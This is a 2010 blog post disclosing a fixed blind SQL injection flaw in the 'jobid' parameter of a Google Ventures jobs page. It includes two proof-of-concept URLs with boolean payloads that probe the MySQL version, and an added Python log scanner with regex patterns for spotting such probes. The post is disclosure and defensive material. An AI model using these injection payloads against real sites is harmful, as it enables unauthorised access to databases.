Wednesday, June 9, 2010

:::SPAS3C-WV-002:::Google App (Ventures) BSQLi Vulnerability



One month ago, I found several vulnerabilities in Google's sites.

These issues all got fixed, and I want to say that the Google Security Team did a good job and fixed them quickly.

All issues were discovered between 4 May and 9 May (in 2010, of course).

This issue is the most important one in my opinion: Blind SQL Injection in googleventures.com

Risk: High

Google Ventures is Google’s venture capital arm.

We do primarily three things:
  1. Seek out the most innovative and interesting entrepreneurs and companies we can find
  2. Perform in-depth due diligence and invest in those we are most excited about
  3. Do everything we can to help those companies succeed
We invest for financial return, across all sectors and in all stages of a company’s growth. We are particularly interested in areas where access to our team, facilities, technology or other resources can help a company become more successful, but we do not limit our investments to those of strategic interest to Google – we look for companies and people that have the best opportunity to create significant, disruptive and innovative ventures.

Source: here

The site was built with PHP+MySQL (some parts), and the GET variable "jobid" was vulnerable to SQL injection.

Proofs of Concept (determining the MySQL version)

Returns 1=1 (true), so the MySQL version is 5.

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=5,1,0)=1--


Fig. 1: BSQLi. True result.

Returns 1=0 (false), so the MySQL version isn't 4.

Link PoC -> http://jobs.googleventures.com/jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=4,1,0)=1--


Fig. 2: BSQLi. False result.
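As an added defender-side example (not part of the original post): a Python scan over constructed access-log lines that URL-decodes the query string and flags "jobid" values that are not plain integers, using the two PoC requests above as the suspicious input. The log format, the integer-parameter list and the marker regexes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original post); the two
# injected requests reuse the proof-of-concept URLs shown above.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2010:10:00:01 +0000] "GET /jobdetail.php?jobid=39109 HTTP/1.1" 200 5120
203.0.113.5 - - [09/Jun/2010:10:00:07 +0000] "GET /jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=5,1,0)=1-- HTTP/1.1" 200 5120
203.0.113.5 - - [09/Jun/2010:10:00:12 +0000] "GET /jobdetail.php?jobid=39109+AND+IF(substring(@@version,1,1)=4,1,0)=1-- HTTP/1.1" 200 312
"""

# Common Log Format, with the request line split into method, target and protocol.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')

# Parameters the application defines as integers (jobid, per the post); any value
# that is not a plain integer is already a policy violation, whatever it contains.
INTEGER_PARAMS = {"jobid"}

# Markers of the boolean-based blind technique from the post, checked after URL decoding.
BLIND_MARKERS = {
    "conditional expression": re.compile(r"\bAND\s+IF\s*\(", re.I),
    "server variable probe": re.compile(r"@@\w+"),
    "string slicing": re.compile(r"\bsubstring\s*\(", re.I),
    "comment terminator": re.compile(r"--\s*$"),
}

def classify(value: str) -> list:
    """Reasons an integer-parameter value looks like blind SQL injection (empty if clean)."""
    if re.fullmatch(r"-?\d+", value.strip()):
        return []
    reasons = ["non-integer value for integer parameter"]
    reasons += [label for label, rx in BLIND_MARKERS.items() if rx.search(value)]
    return reasons

def scan(log_text: str) -> list:
    """Parse each log line, URL-decode its query string and flag suspicious integer parameters."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        for name, value in parse_qsl(url.query, keep_blank_values=True):  # decodes '+' and %xx
            if name in INTEGER_PARAMS and (reasons := classify(value)):
                findings.append({"ip": m["ip"], "path": url.path, "param": name, "value": value,
                                 "status": m["status"], "size": m["size"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        # The two flagged requests differ only in the compared digit yet return different
        # sizes; that size difference is the oracle a boolean-based blind probe reads.
        print(f["ip"], f["path"], f["param"], f["size"], ", ".join(f["reasons"]))
```

Baselining response sizes per path lets the same scan also surface true/false pairs from one client even when the payload markers change.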

I also tried a SQL injection with a "UNION SELECT" statement, but it didn't work.


Fig. 3: Trying SQL Injection "Union Select". MySQL error.

I didn't want to do further research because I considered that enough.

Be safe ;)